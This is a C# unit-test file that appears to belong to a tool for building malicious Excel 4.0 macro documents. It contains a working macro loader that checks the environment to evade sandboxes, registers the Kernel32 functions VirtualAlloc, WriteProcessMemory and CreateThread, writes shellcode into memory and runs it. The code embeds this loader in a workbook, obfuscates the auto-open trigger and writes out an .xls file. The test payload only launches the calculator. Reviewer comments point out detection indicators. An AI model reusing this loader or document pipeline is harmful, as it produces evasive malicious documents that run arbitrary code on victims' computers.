public void TestGenerateMacroForPayload()
        {
            // Builds the payload macro strings from the test shellcode supplied by TestHelpers
            // (by its name, a calculator-launching proof of concept) and checks one property:
            // the final entry must be the literal "END".
            // InsertFormulaTest's loader in this file loops WHILE(ACTIVE.CELL()<>"END"), so this
            // terminator is presumably what stops that copy loop.
            // NOTE(review): only the terminator is asserted; the encoded payload rows before it
            // are not checked here.
            List<string> payloadMacros = FormulaHelper.BuildPayloadMacros(TestHelpers.GetPopCalcShellcode());
            string       finalEntry    = payloadMacros.Last();

            Assert.AreEqual("END", finalEntry);
        }
        public void InsertFormulaTest()
        {
            // End-to-end document build: load the macro test workbook, insert a loader macro
            // column and a payload column ahead of the existing last Formula record, redirect
            // that record to the inserted cells, and write the result as an .xls file.
            // NOTE(review): there is no Assert in this test. It passes whenever no call throws,
            // so it works as a crash regression (the output file name suggests a "<>" parser
            // bug) rather than as a check of the generated document.
            // NOTE(review): the written workbook stays in the test assembly directory and
            // contains a working loader. Endpoint protection on a build agent may quarantine
            // it, so confirm where this test is expected to run.
            WorkbookStream sourceStream = new WorkbookStream(TestHelpers.GetMacroTestBytes());

            List<Formula> existingFormulas = sourceStream.GetAllRecordsByType<Formula>();

            // Every Formula record except the final one, which is handled as the halt formula below.
            int recordsBeforeHalt = existingFormulas.Count - 1;

            // Loader formulas, kept byte-for-byte. Detection-relevant content: the first formula
            // closes the workbook when GET.WORKSPACE(13) is below 770 (an environment gate, so
            // dynamic analysis may see no further activity), and the REGISTER calls bind Kernel32
            // VirtualAlloc, CreateThread and WriteProcessMemory from a macro sheet, which is a
            // strong static indicator on its own.
            List<string> loaderMacros = new List<string>
            {
                "=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",
                "=ALERT(\"Into Payload Loader\",2)",
                "=REGISTER(\"Kernel32\",\"VirtualAlloc\",\"JJJJJ\",\"VA\",,1,0)",
                "=REGISTER(\"Kernel32\",\"CreateThread\",\"JJJJJJJ\",\"CT\",,1,0)",
                "=REGISTER(\"Kernel32\",\"WriteProcessMemory\",\"JJJCJJ\",\"WPM\",,1,0)",
                "=VA(0,1000000,4096,64)",
                "=SELECT(R1C3)",
                "=SET.VALUE(R1C4,0)",
                "=WHILE(ACTIVE.CELL()<>\"END\")",
                "=WPM(-1,R6C2+R1C4,ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)",
                "=SET.VALUE(R1C4,R1C4+LEN(ACTIVE.CELL()))",
                "=SELECT(,\"R[1]C\")",
                "=NEXT()",
                "=ALERT(\"Popping Calc\",2)",
                "=CT(0,0,R6C2,0,0,0)",
                "=ALERT(\"Closing Thread\",2)",
                "=HALT()"
            };

            byte[]       testShellcode = TestHelpers.GetPopCalcShellcode();
            List<string> payloadMacros = FormulaHelper.BuildPayloadMacros(testShellcode);

            // Loader records use 1 as the last argument and payload records use 2.
            // Presumably this is the destination column; confirm against ConvertStringsToRecords.
            List<BiffRecord> insertedRecords = FormulaHelper.ConvertStringsToRecords(loaderMacros, recordsBeforeHalt, 0, 0, 1);

            // The payload offset is taken before AddRange runs, so it counts only the loader records.
            int payloadOffset = recordsBeforeHalt + insertedRecords.Count;
            List<BiffRecord> payloadRecords = FormulaHelper.ConvertStringsToRecords(payloadMacros, payloadOffset, 0, 0, 2);
            insertedRecords.AddRange(payloadRecords);

            // Work on a clone of the last Formula record so the original can still be used
            // as the anchor for InsertRecords and ReplaceRecord.
            Formula originalHalt = existingFormulas.Last();
            BiffRecord haltClone = (BiffRecord)originalHalt.Clone();
            Formula relocatedHalt = haltClone.AsRecordType<Formula>();

            // Unchecked narrowing to ushort: a sum above 65535 would wrap silently.
            relocatedHalt.rw = (ushort)(recordsBeforeHalt + insertedRecords.Count);

            Formula jumpFormula = FormulaHelper.GetGotoFormulaForCell(relocatedHalt.rw, relocatedHalt.col, 0, 1);

            // Insert relative to the original halt record, swap that record for the GOTO
            // formula, then apply the library's ObfuscateAutoOpen step.
            WorkbookStream finalStream = sourceStream
                .InsertRecords(insertedRecords, originalHalt)
                .ReplaceRecord(originalHalt, jumpFormula)
                .ObfuscateAutoOpen();

            ExcelDocWriter docWriter = new ExcelDocWriter();

            string outputPath = TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "not-equals-parser-bug.xls";
            docWriter.WriteDocument(outputPath, finalStream);
        }